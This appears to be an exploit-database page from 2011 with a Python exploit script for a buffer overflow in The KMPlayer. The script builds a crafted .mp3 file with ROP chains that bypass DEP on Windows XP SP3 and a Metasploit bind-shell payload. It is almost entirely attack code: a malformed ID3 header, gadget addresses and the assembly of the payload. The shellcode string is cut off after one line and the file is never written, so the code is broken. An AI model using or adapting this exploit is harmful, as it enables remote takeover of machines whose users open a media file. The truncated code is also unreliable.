The KMPlayer (Windows XP SP3) – ‘.mp3’ File Buffer Overflow (DEP Bypass)

  • 作者: dookie & ronin
    日期: 2011-06-06
  • 类别:
  • 来源:
  • #!/usr/bin/python
    # The KMPlayer .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
    # Downloaded from:
    # 06 Jun 11
    # Cobbled together by dookie and ronin
    # This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
    # In our testing environments, there were 2 separate offsets. One offset
    # applies to VMs running on Xen and VMware workstation for Linux. The
    # second offset applies to ESXi and VMware Fusion.
    import os
    evilfile = "km_pwn.mp3"
    head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"
    cruft = "\x85" * 3162
    nops = "\x90" * 28
    nops += "\x91\x90\x90\x90"		# The last byte gets decremented in rop2 while pointing EAX at the shellcode
    nops += "\x90" * 20
    #shellcode = "\xcc" * 368		# Size of bind shell
    #root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
    #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
    shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
    ##################### ROP Chain for VMware Workstation (Linux) and Xen #####################
    eip = "\x71\x14\x40\x00"		# 00401471 RETN	Pivot to the stack
    toesp = "\x42" * 4
    wpm = "\x13\x22\x80\x7c"		# 7C802213 WriteProcessMemory - XPSP3
    wpm += "\x20\x1f\x45\x02"		# 02451F20 in_wm.dll - Return after WPM
    wpm += "\xff\xff\xff\xff"		# hProcess
    wpm += "\x10\x1f\x45\x02"		# 02451F10 in_wm.dll - Address to Patch
    wpm += "\xbe\xba\xfe\xca"		# lpBuffer placeholder (Shellcode Address)
    wpm += "\xce\xfa\xed\xfe"		# nSize placeholder (Shellcode Size)
    wpm += "\xc0\x2b\x45\x02"		# 02452BC0 in_wm.dll - Pointer for Written Bytes
    # Get a copy of ESP into a register
    rop1 = "\x4f\x92\x71\x13"		# 1371924F :{POP}# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
    rop1 += "\x41" * 12				# Junk to be popped into ESI, EBP, and EBX
    junk = "\x61" * 52				# Junk in between our VirtualProtect parameters and the next ROP chain
    # Put a copy of the saved ESP from EDI into EAX
    rop2 = "\x75\x66\x8a\x5b"		# 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)
    rop2 += "\x41" * 8				# Compensate for the RETN 8 in rop1
    # Increase EAX to point at our shellcode
    rop2 += "\x37\x75\x37\x02"		# 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
    rop2 += "\x37\x75\x37\x02"		# 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
    # Write the address of the shellcode into the lpBuffer placeholder
    # First need to put EAX in a safe spot then juggle around EDI to get it to ESI
    rop2 += "\xc3\x87\xec\x76"		# 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll)
    rop2 += "\x75\x66\x8a\x5b"		# 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)
    rop2 += "\xd8\xc3\x3c\x76"		# 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)
    rop2 += "\xc3\x87\xec\x76"		# 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll)
    rop2 += "\xbe\x9c\xca\x76"		# 76CA9CBE :# MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
    rop2 += "\x41" * 4				# Junk to be popped into ESI
    # Get the intial ESP value back into ESI
    rop2 += "\xe6\x57\x01\x15"		#150157E6 :{POP}# DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
    rop2 += "\x41" * 8				# Junk to be popped into EBX and ECX
    # Get the initial ESP value back into ESI
    rop2 += "\xd8\xc3\x3c\x76"		# 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)
    # Zero EAX and set it to the shellcode size (0x200)
    rop2 += "\xc0\x11\x37\x02"		# 023711C0 :# XOR EAX,EAX # RETN (in_mp4.dll)
    rop2 += "\xe9\x0b\x44\x02"		# 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll)
    rop2 += "\x41" * 4				# Junk to be popped into EBP
    rop2 += "\xe9\x0b\x44\x02"		# 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll)
    rop2 += "\x41" * 4				# Junk to be popped into EBP
    # Write the shellcode size into the nSize placeholder
    rop2 += "\x3f\xcf\x9e\x7c"		# 7C9ECF3F :{POP}# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
    rop2 += "\x41" * 8				# Junk to be popped into ESI and EBP
    # Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
    rop2 += "\x41\x15\x5d\x77"		# 775D1541 :# SUB EAX,4 # RETN (ole32.dll)
    rop2 += "\x41" * 4
    rop2 += "\x51\xeb\x43\x02"		# 0243EB51 :# ADD EAX,0C # RETN (in_wm.dll)
    rop2 += "\xce\x05\x42\x02"		# 024205CE :{POP}# PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
    rop2 += "\x41" * 4				# Junk to be popped into ESI
    rop2 += "\x41" * 32
    ############################# ROP Chain for VMware Fusion and ESXi ############################
    ## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
    #put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
    jmp_value = "\xf0\x38\x00\x00"
    rop_1 = "\x46"*4
    #0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)**
    rop_1 += "\x2c\x80\x44\x77"
    #0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)**
    rop_1 += "\x75\x66\x8a\x5b"
    #0x7C926021 :{POP}# SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)**
    rop_1 += "\x21\x60\x92\x7c"
    rop_1 += "\x50" * 8
    #0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)**
    rop_1 += "\x09\x15\x45\x7e"
    filler_a1 = "\x41"*360
    ## ROP_2 = all about the shell
    ######### SAVING STACKPOINTERS ################################################################
    #0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)**
    rop_2 = "\x2c\x80\x44\x77"
    #0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)**
    rop_2 += "\x75\x66\x8a\x5b"
    #0x5B8A9F1E :# ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)**
    rop_2 += "\x1e\x9f\x8a\x5b"
    rop_2 += "\x43\x43\x43\x43"
    #WriteProcessMemory construct with the two placeholders we need to generate on the fly
    rop_2 += "\x13\x22\x80\x7c"	#WriteProcMem - XPSP3
    rop_2 += "\x00\x2e\x98\x7c"	#ntdll - patching target
    rop_2 += "\xff\xff\xff\xff" #hProcess
    rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
    rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address)
    rop_2 += "\xce\xfa\xed\xfe" #lpBuffer placeholder (Shellcode Size)
    rop_2 += "\10\x20\x98\x7c"#writeable location in ntdll
    ######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)###############################
    #gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
    #then we write the value to the correct memory address and restore EAX
    rop_2 += "\x44" * 40
    #0x7C974E8E :# ADD EAX,100 # POP EBP # RETN(ntdll.dll)**
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x44" *32
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x44"*4
    #0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)**
    rop_2 += "\x8d\xda\x45\x7e"
    #0x77DD994E :# XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)**
    rop_2 += "\x4e\x99\xdd\x77"
    #0x7C910C66 :# XCHG EAX,ESI # RETN 2 (ntdll.dll)**
    rop_2 += "\x66\x0c\x91\x7c"
    rop_2 += "\x44" * 2
    #0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)**
    rop_2 += "\x8d\xda\x45\x7e"
    rop_2 += "\x44"*2
    rop_2 += "\xbe\x9c\xca\x76"
    ######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ##################################
    #gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
    #then we write the value to the correct memory address and restore EAX
    rop_2 += "\x47" *4
    #0x775D156E :# PUSH EAX # POP ESI # RETN (ole32.dll)**
    rop_2 += "\x6e\x15\x5d\x77"
    #0x7E433785 :# XOR EAX,EAX # RETN 4(USER32.dll)**
    rop_2 += "\x85\x37\x43\x7e"
    #0x7C974E8E :# ADD EAX,100 # POP EBP # RETN(ntdll.dll)**
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x45"*8
    rop_2 += "\x8e\x4e\x97\x7c"
    rop_2 += "\x45"*4
    #0x75D0AA2E :# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN(mlang.dll)**
    rop_2 += "\x2e\xaa\xd0\x75"
    ######### Realigning EAX to point to WPM and setting ESP to it ################################
    rop_2 += "\x50" * 4
    #0x76CAF118 :# ADD EAX,0C # RETN (IMAGEHLP.dll)**
    rop_2 += "\x18\xf1\xca\x76"
    #0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)**
    rop_2 += "\x09\x15\x45\x7e"
    rop_2 += "\x43"*316
    ##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
    #slide into the shell
    nops_7 = "\x90"*56
    #after the shell junk
    filler_a2 = "\x42" * (3200)
    ############################# PUTTING IT TOGETHER #############################################
    filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2
    #small buffer filler
    filler_b = "\x44" * (95)
    #the whole shebang (ronin's version)
    filler = filler_a+jmp_value+eip+rop_1+filler_b
    sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler
    crashy = open(evilfile,"w")